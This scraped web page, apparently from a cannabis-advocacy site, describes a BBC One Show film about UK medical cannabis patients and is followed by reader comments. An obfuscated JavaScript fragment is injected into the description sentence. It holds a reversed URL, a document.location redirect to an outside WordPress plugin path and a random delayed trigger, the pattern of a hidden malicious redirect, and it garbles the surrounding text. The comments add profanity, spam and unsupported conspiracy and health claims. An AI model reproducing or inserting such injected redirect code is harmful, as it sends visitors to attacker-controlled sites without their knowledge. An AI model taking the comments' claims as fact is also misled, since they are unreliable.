UK Medical Cannabis Patients Still Suffering – BBC One Show 13/5/19

Short film on how medical cannabis patients are still being failed by the UK government despite optimism about recent changes toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to the law. Broadcast BBC One 13/5/19

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24 thoughts on “UK Medical Cannabis Patients Still Suffering – BBC One Show 13/5/19”

  1. Zoe (Scotland) says:

    what a corrupt country we live in

  2. Mr3daWEED says:

    The government need to swallow their pride and just do what's right already! How many people need to suffer and be forced to take opiates (worst drugs around) when Cannabis is safe and effective. Makes me so angry.

  3. petMYster says:

    Evidence? You didn’t listen to David Nutt instead you sacked him

  4. Rubarb Crumble says:

    The Tories want people dead.

  5. Just_David says:

    Fuck off! The dickheads that say more studies need to be done are not ill and the booze they consume is not medicinal! THEY take drugs when they are eating their dinner, ….Who do they think they are?

  6. Richard Johnson says:

    Fuck sake,the NHS don't understand?That doesn't really make sense…I'm glad your getting your treatment now.

  7. Richard Johnson says:

    I self medicated for ages and it got me through…the anxiety came from lack of supply and the legal ramifications.

  8. shawn the beep says:

    i keep hearing about how the uk is the biggest exsporter of medical weed . so many people that need to jump country to get medicated . its a hard situatiom for people to be in . i figure the govement are dragging there heals on the matter to give phama more time to produce drugs from it . this health excuse is just that an excuse . there are years of evidence of people taking it . yet they are still saying it need to be health reports about it to find out if its safe. in govement little gets done that someone isnt making money out off . this is now different . they could decrimalize it tommorrow without need for a health report that takes better part of a year. if see simular reactions to when i used to send my kids to bed . arrr dad just a little longer (random excuse follows as to why they need more time). seem like the average polictions these days is more about not doing anything wrong then to do the right thing.

    here is the real tinfoil hat time . i would even believe that big buissness is lobbying govement to slow down the that when the law changes they can open shops everywhere at the same time to get a better share of the market.

  9. Dave 93 says:

    1 Million paid hours yearly wasted on Police enforcing prohibition.
    The only I.D. children need to buy ANY (potentially unsafe) drugs on our streets is cash money.
    The tax revenue from U.K. legal weed sales would be hundreds of millions of £.
    It could revitalize our NHS and School funding.
    Peanuts kill more people a year then Cannabis, ever. Alcohol and tobacco cause significant health and social problems yet they're legal, regulated and tolerated.
    It's an utter disgrace how the Conservatives indirectly profit from exporting 'medicinal cannabis' worldwide via GW Pharma… and then refuse sick children and adults NHS prescriptions.
    These capitalists in office don't give a f*ck about sick people as long as they're making money that's all that matters to them.

  10. Ganja Train says:

    excellent upload!

  11. Ganja Train says:

    Very nice video!

  12. Ganja Train says:

    Very nice work!

  13. Ganja Train says:

    Nice share!

  14. Ganja Train says:

    great share!

  15. Ganja Train says:

    Nice video!

  16. JENOVA says:

    This country is a total disgrace.

  17. Vinicio Montana says:

    Its a herb a plant not a drug it grows there is no chemical process to make it into a drug… yet the drugs the perscribe from the chemist fentynal opiates etc are dangerous addicive drugs that they profit off they could profit off cannabis like they do from alcohol with extornate taxes but then people will live longer and actually receive their pension they want to kill you off before you recive a penny off your pension youv been forced to pay into with national insurance all your life goverments are tbe biggest mafia

  18. Ganja Train says:

    Legalize marijuana everywhere!

  19. cyberash3000 says:

    just let us grow our own. please. i cant use opiods as my job involves drinking beer, and im in pain with my legs. constantly but my condition doesnt fall under the allowed list. and even if i could get a prescription, i cant affford 2 grand a month or to go abroad for it. i want to get back to work i want to start my own business i like adding to society and paying my taxes i dont like being out of work

  20. Ganja Train says:

    Nice upload!

  21. Ganja Train says:

    Legalize marijuana everywhere!

  22. John Harrison says:

    and the may,s are still making millions selling cannidis medicine to other countries

  23. FREEDOM says:

    This is because they have taken out the THC its all the plant that's the cure the Cbd and Thc work together. They split it to take control and pharma can then make the money for the government. Sick psycopathic scum.

  24. Rodney Stewart Adams says:

    Too many with #autism #dementia #parkinsons #epilepsy in care homes denied medical cannabis – how can care homes #NHS afford these extortionate fees – grow your own +demand a Jury that's the Democratic process! Police are using Cannabis Warnings +Cautions to CRIMINALIZE Brutalize +Victimize the poor youth It just POLICE INTIMIDATION the prohibition is finished

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